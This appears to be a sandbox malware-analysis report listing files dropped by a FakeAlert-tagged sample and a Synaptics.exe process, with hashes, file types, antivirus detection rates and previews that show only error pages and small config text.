                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1245
                                                                                                                                                                                                                          Entropy (8bit):5.462849750105637
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                                                                                                                                                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                                                                                                                                                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                                                                                                                                                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                                                                                                                                                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2538488495012965
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0jfuHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+fH+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4C48E0B87A4974DA3DE8457A715269D3
                                                                                                                                                                                                                          SHA1:DDB4D66024C5BA01BC25E48D0395C8B41A2682EF
                                                                                                                                                                                                                          SHA-256:23C673444C8F195FEB25442859855FA082B349C9AC651D869131BFD6FE901964
                                                                                                                                                                                                                          SHA-512:9BDD4325033BF6C4ECC3E3AA23997A8AF96E011335661BB6FB352FCEF25A0449D51ED510669A71C8ED1D5179717C721490F0913AB6141BFCDBA37DCF0B82877D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rowmsU0DcTwrnBwJYGhWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.241966032718902
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0cGvXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+o+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4B9B6FD7A34D94AD24A87D76D3FDD2C3
                                                                                                                                                                                                                          SHA1:8141F00B616B6CA841ED57D82EB1EB0B7613A12C
                                                                                                                                                                                                                          SHA-256:D21DBDEECCD85A7EB3C3BA85F8DF0D45902787F488BF1270B19A6853F6D5F13F
                                                                                                                                                                                                                          SHA-512:89C0DE2A01F887724788F26237FD423907CB4042E25F5CF2D5AC1383CA34EE4EDAC18F66976B35B93D82E056C59D843047A4AA4FD05A8436298A94E8E5E9C583
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2761258398996995
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0wwDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+OD+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:176F1492E63CC1F711735979D8A32171
                                                                                                                                                                                                                          SHA1:035F7B4A86A3DD76CDAD7A682040F69997FA44F1
                                                                                                                                                                                                                          SHA-256:5CB68617B56B399933755F09D64E5B3032E98F018FEDDADC0C5881C44A5861EE
                                                                                                                                                                                                                          SHA-512:D93CAA484C432D2FC67EACB34FDCA9C7E2412D30F7A32C66F35699D7DD649E66CD85A2E26B5AC88B9B6467447202E912D74DC4C01B060DA1D975F4D7D093D273
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.247285736491689
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:34E8A34A8823300FE9E6C2D1ECB4625C
                                                                                                                                                                                                                          SHA1:EF1DF33551C1F46F8E2EAAC6399B96857EC3DE23
                                                                                                                                                                                                                          SHA-256:E0B88938C54900BB7A6AF22DA6A9862D79C04560566DCBC875A54EB5E8C4A847
                                                                                                                                                                                                                          SHA-512:6934B3469C18C029F880181B3F9B8647F68C510ADE9AC29D80C081FA155D3F4BF13DDBF6097D2355ECE93BDB7968B64A6ED48091588505BF2C538A7144871B5A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2706656883077185
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0XKq+3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:03C4197A74BD1FF6F45FB95D05FCA272
                                                                                                                                                                                                                          SHA1:2988F1E5E719189717A4C3C570F7A51E5ADBB493
                                                                                                                                                                                                                          SHA-256:EE86F8E80C639AE711C59ADB3AD51C3C6CBF4A7AD6CE97F79D405198678F5809
                                                                                                                                                                                                                          SHA-512:9EFFB84272D34E842A09B2A26E3940D08A4C925C45934F3112DB13A92075B22F0A3AD315A48DF291CBE3AA4AC718F9B385144396540873C8F2446EEC347FE800
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                                                                          Entropy (8bit):5.814115788739565
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                                                          MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                                                          SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                                                          SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                                                          SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious
• Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious
• Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious
• Filename: PO64747835 PDF.exe, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtf, Detection: malicious
• Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious
• Filename: ALuh1ODGq3.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious
• Filename: pago.exe, Detection: malicious
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.264099888586555
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0zDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+kD+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:1777D1776247C1C150D1386480A52D5F
                                                                                                                                                                                                                          SHA1:0A6B244BCD6F0C091C3702956E626F102EA0ECB5
                                                                                                                                                                                                                          SHA-256:6758A377D86B503565A8E871C887D7AD9401E05677514C422913B0C6C2463182
                                                                                                                                                                                                                          SHA-512:932E56AA1501AE8A1A669F2446490C0A11942FED49CC775B924BB989061090D5DE6F311CBA2AAA94419BF5F64242C1E45BFFF091817F7EE8680EB8ECE55A2D5B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cMw69lcQftZBEgjRqwMv0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                          Size (bytes):106
                                                                                                                                                                                                                          Entropy (8bit):5.091457983029907
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:yionv//thPl9vt3lAnsrtxBllNM9NlysfLsQmv//lH1p:6v/lhPysH8Nlysfmv/Tp
                                                                                                                                                                                                                          MD5:89B8C9C7F53554F3C57C1BF4881BC0CA
                                                                                                                                                                                                                          SHA1:D3231B624F8C2DD2A569F0B87BD58162412CF5C8
                                                                                                                                                                                                                          SHA-256:E5BDA8AF2A41C34F47054318E16508C53718ED641D1404F7C33E1DD1E6142184
                                                                                                                                                                                                                          SHA-512:D6CBAF433E3EB9680854C381756FC91A97464D614B9A03E3787389901301433AF243D7A183A06CBE6E9DE1CBA2E7E882D6EE5D94AA300872C3B5B684A3DA399B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.272581421592352
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0X7jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+S7j+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B6FB539BCAB3116CEA69C000B9D74B91
                                                                                                                                                                                                                          SHA1:91DCBEA37B11FE5EE1CA774848DD144AA19B6FA1
                                                                                                                                                                                                                          SHA-256:94CC356127E3401D9F37DDC60770E6B051802B1D0EB7EAF292A03C5D7EE24DAC
                                                                                                                                                                                                                          SHA-512:C4F7C6C5EB5D21533174C9BD5182F233E2C060D463139C22E7B58E0755EA92D680420ACBDAE717BE742AA9429FB9D0C91BF14EEA85B1CFD893A78610B89EC1CC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6uQV_DFuTz69vnKPOKoRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2606686072324695
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+039SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+G9+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:BD38955B991754EFE470B8DD1FDDF581
                                                                                                                                                                                                                          SHA1:D3E2177D57A5622FDA732CBF9F2315F1974924D0
                                                                                                                                                                                                                          SHA-256:39E3B7C900CD1A506A61DC377E9DC0FBDA1FA1A56F468AC4C6B53BE210A758FA
                                                                                                                                                                                                                          SHA-512:15AE86563E7518EB2E2B29987414C4C2A6590030C8DB796B6C8A0073F50B52D707F79E28A3E58BAF33E42A281641E1A13D688D18095F1F431DE93493CA3C98C0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2QCmLkBa5UMVbBw2_3n4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2755014329235905
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0Z/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++/+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:354E2C57D378E5EA6BC9709146EAD0BC
                                                                                                                                                                                                                          SHA1:CA1F92B59F6E49813EE4C3B224DCBE188B482728
                                                                                                                                                                                                                          SHA-256:EC8F675F0B39B4FE025E1E1FFEE9EAD23C18F22A578407CFB061059C2EC5C1A8
                                                                                                                                                                                                                          SHA-512:4305F1497F8E9AA6BF4AB37126D2DAE314B7DA2BECEC76009D6EB498FE1984C75E21E8ED20E0340C98D584C91A1D2FB7395BEB77931574534B202A14B8C2FE44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UybNnfUTId6PZOGyPPR7KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.267316178507448
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+07ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:0E6661BB2B5A360FAD648504CFAB865F
                                                                                                                                                                                                                          SHA1:DA492B9CB24E48B17B969E3B3D963519F97F099F
                                                                                                                                                                                                                          SHA-256:E06FF37FA3DE709ACC66E9504BF60F44F395DE2E51588D7BFA944AEBD532FA7A
                                                                                                                                                                                                                          SHA-512:DD6C5F2C6CBE63D8E824D859A211380DD28C15A59944D1C21497561112F9F3E103E69A60C01F35991E9A0C40F7217100D8D6E76048184CAEE380E94620B12BAE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2OHPjf6y9NY3HVV-pbgiUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31
                                                                                                                                                                                                                          Entropy (8bit):4.453880987666651
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:DIjAW11wA:DYkA
                                                                                                                                                                                                                          MD5:9ACAEC3B95B7873B0B438825AA485B5B
                                                                                                                                                                                                                          SHA1:8A7A84F97759EE701402C96B0B5427E031AA92CD
                                                                                                                                                                                                                          SHA-256:13B015F0138E1D08D4A91CA186CF126CAD93ED8F2900457EA1212E816D70BCC5
                                                                                                                                                                                                                          SHA-512:F95ED36556398C6E08DE3466A472504011FBA1F27A77ED310C10F47784B464C9B49FD0F06DF161766F47BD106B3BC70E610BDD3AE717E290989813A7AB7D763F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:[GLASFIBRES]..Lerdues61=Swept..
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1270272
                                                                                                                                                                                                                          Entropy (8bit):7.2217362129262685
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:TnsJ39LyjbJkQFMhmC+6GD9pYhK8VbNIf8gV2D:TnsHyjtk2MYC5GDwhKzy
                                                                                                                                                                                                                          MD5:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                                                          SHA1:41AD10EE96250D8186D02E3D96923163CB664247
                                                                                                                                                                                                                          SHA-256:8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
                                                                                                                                                                                                                          SHA-512:303A40AC70E1E0BEDC08B55F5A0750A29F7E6EBCB55406293DD0F939D816CADC7FD0F6B604D607FD7478EB851A3648B1E5456CA51C971E494DA680FA44F5A8FE
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):498497
                                                                                                                                                                                                                          Entropy (8bit):7.745692538224731
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:UYhK8VbimV4PPzrMx6I/zghbBmJY18c2qt:UYhK8VbNIf8gV2w
                                                                                                                                                                                                                          MD5:C4B2332489C0BA3E3F2A262F1C2C31B8
                                                                                                                                                                                                                          SHA1:9EB3D3CB6B4F160F4DC5A8921A8483A145E814FC
                                                                                                                                                                                                                          SHA-256:9E5C0EB06D969F8DD4844C1ABAB791C59FEBDDDD82A5239CBCBEB4570DF07A06
                                                                                                                                                                                                                          SHA-512:B6DD828059E5EA139D691EB2D813E9349F6342E57017F2E57C76C3CF2A94C460A9569561EB18AC22E300992F6CDB44C67C05E438F6A3878E6450A525CE92A9BB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2262528
                                                                                                                                                                                                                          Entropy (8bit):7.487265723978036
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:onsHyjtk2MYC5GDzso5AJs+gYGh3JfEwVu4H:onsmtk2aS5AJJcEws4H
                                                                                                                                                                                                                          MD5:FA4C249127C8D6D3661A369551570EB3
                                                                                                                                                                                                                          SHA1:BB1FAA2CD5C36DC224BF162B6C7D381F91A49431
                                                                                                                                                                                                                          SHA-256:4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
                                                                                                                                                                                                                          SHA-512:141F2CDE2F424B8883203463AC093B5789A6C2C2B359CA6CF54E9FA8068F91354CC6873DD885CDC92B60D524C9E9080A710036E39764F4931586F38599A32063
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5883
                                                                                                                                                                                                                          Entropy (8bit):5.400215318736802
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:BZIhtNiyqDo1ZQUZLhtNiyqDo1Ze3v1vvvjZWhtNiyqDo1ZsSv/v/v2Zp:v
                                                                                                                                                                                                                          MD5:D69467F265F7D0E645CA865DEACA44D9
                                                                                                                                                                                                                          SHA1:874D64130A943BE590F623C1A35D3E7276035C82
                                                                                                                                                                                                                          SHA-256:715C6B499837F4C13A8ADE747B1B73A2C66137F495324F6D4FD173BECFB717B2
                                                                                                                                                                                                                          SHA-512:4DF0F16E5CC4248DD1EBD05A1049696867A150517838AE69BD2C3CB6221F32B23DD25ABE8CB52EF0AE9CE091DBDDBE44D401389B9D4FF91150ABA6AC3323C2E5
                                                                                                                                                                                                                          Malicious:false
